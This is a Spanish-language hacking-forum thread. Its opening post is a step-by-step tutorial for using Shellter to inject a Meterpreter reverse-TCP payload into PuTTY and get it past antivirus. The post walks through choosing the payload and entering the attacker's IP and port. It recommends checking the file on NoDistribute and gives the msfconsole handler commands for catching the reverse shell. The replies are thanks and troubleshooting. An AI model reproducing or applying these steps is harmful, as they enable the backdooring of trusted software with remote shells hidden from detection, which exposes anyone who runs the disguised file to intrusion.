comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Evadiendo Antivirus con Shellter

  • 6 Respuestas
  • 6047 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LionSec

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • lionsec.net
    • Email
« en: Julio 13, 2015, 04:32:00 pm »
Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación .

Para más información visita : No tienes permisos para ver links. Registrate o Entra con tu cuenta.

Instalación

Lo primero que haremos es descargarlo desde su página oficial (No tienes permisos para ver links. Registrate o Entra con tu cuenta) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

Código: Bash
  1. apt-get update
  2. apt-get install shellter
  3.  
Instalación en backbox

Primero hay que agregar los repositorios :

Código: Bash
  1. nano /etc/apt/sources.list

Añadimos las siguientes entradas :

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main

Código: Bash
  1. apt-get update
  2. apt-get install shellter

Instalación en Arch Linux :

Código: Bash
  1. yaourt -Syy
  2. yaourt -S aur/shellter


En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A) .



Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .



Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurarlo manualmente .

Vamos a teclear (L)



Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .



Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado




:) :)

OK , sólo nos queda configurar el "listener" .

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit



En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .



Demo


Bueno amigos , eso ha sido todo . Espero que le sirva a más de uno .

Fuente : No tienes permisos para ver links. Registrate o Entra con tu cuenta


Saludos
« Última modificación: Agosto 07, 2015, 09:43:18 pm por Gabriela »

Desconectado Vector

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Julio 13, 2015, 10:10:41 pm »
excelente aporte @No tienes permisos para ver links. Registrate o Entra con tu cuenta probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR

Desconectado LionSec

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • lionsec.net
    • Email
« Respuesta #2 en: Julio 14, 2015, 03:28:16 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
excelente aporte @No tienes permisos para ver links. Registrate o Entra con tu cuenta probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Gracias @No tienes permisos para ver links. Registrate o Entra con tu cuenta , espero que te sirva

Desconectado gr0ny

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Julio 29, 2015, 07:53:46 pm »
Hola buenas tardes, primero que todo muy buen aporte; muchas gracias.
Tengo un problema:
- Cuando llego a la parte de seleccionar los payloads no se muestra ninguno, queda en Select payload... Pero no se muestra ningun payload a seleccionar.
Me podrian ayudar por fa?

Gracias

Desconectado Vector

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Agosto 30, 2015, 12:31:00 pm »
Hola @No tienes permisos para ver links. Registrate o Entra con tu cuenta, mmm que OS usas??, yo usé Kali v1 y funcionó perfecto, eso si que tube que instalar el Wine, y eso que no se muestren los payloads... prueba iniciando la DB con #service postgresql start y prueba el shellter.

documentacion de kali: No tienes permisos para ver links. Registrate o Entra con tu cuenta
espero por ayudarte.

Saludos.
Vector  ;D

Desconectado - ALEAJANDRO -

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Octubre 17, 2015, 08:46:39 pm »
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Desconectado zupa

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 0
  • Hacktivism is life
    • Ver Perfil
« Respuesta #6 en: Octubre 19, 2015, 01:29:06 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Se mas especifico para poder ayudarte, que tipo de error te da.

 

¿Te gustó el post? COMPARTILO!



[Leer] Test para tu Firewall, Antivirus & Navegadores

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1699
Último mensaje Junio 24, 2011, 12:02:36 am
por LucaSthefano
HERCULES: Genera un payload y evade los antivirus

Iniciado por afravaz

Respuestas: 2
Vistas: 2608
Último mensaje Septiembre 09, 2016, 04:07:48 pm
por ro0tmag
Como eliminar Virus del Pc sin antivirus

Iniciado por k43l

Respuestas: 4
Vistas: 3928
Último mensaje Enero 20, 2013, 10:21:01 pm
por k43l
Veil – Evasión de Antivirus

Iniciado por Stuxnet

Respuestas: 1
Vistas: 2095
Último mensaje Diciembre 12, 2013, 09:45:48 am
por ANTRAX
Prueba tu antivirus con Wicar

Iniciado por rreedd

Respuestas: 1
Vistas: 945
Último mensaje Enero 31, 2018, 03:17:16 am
por user_en1gm4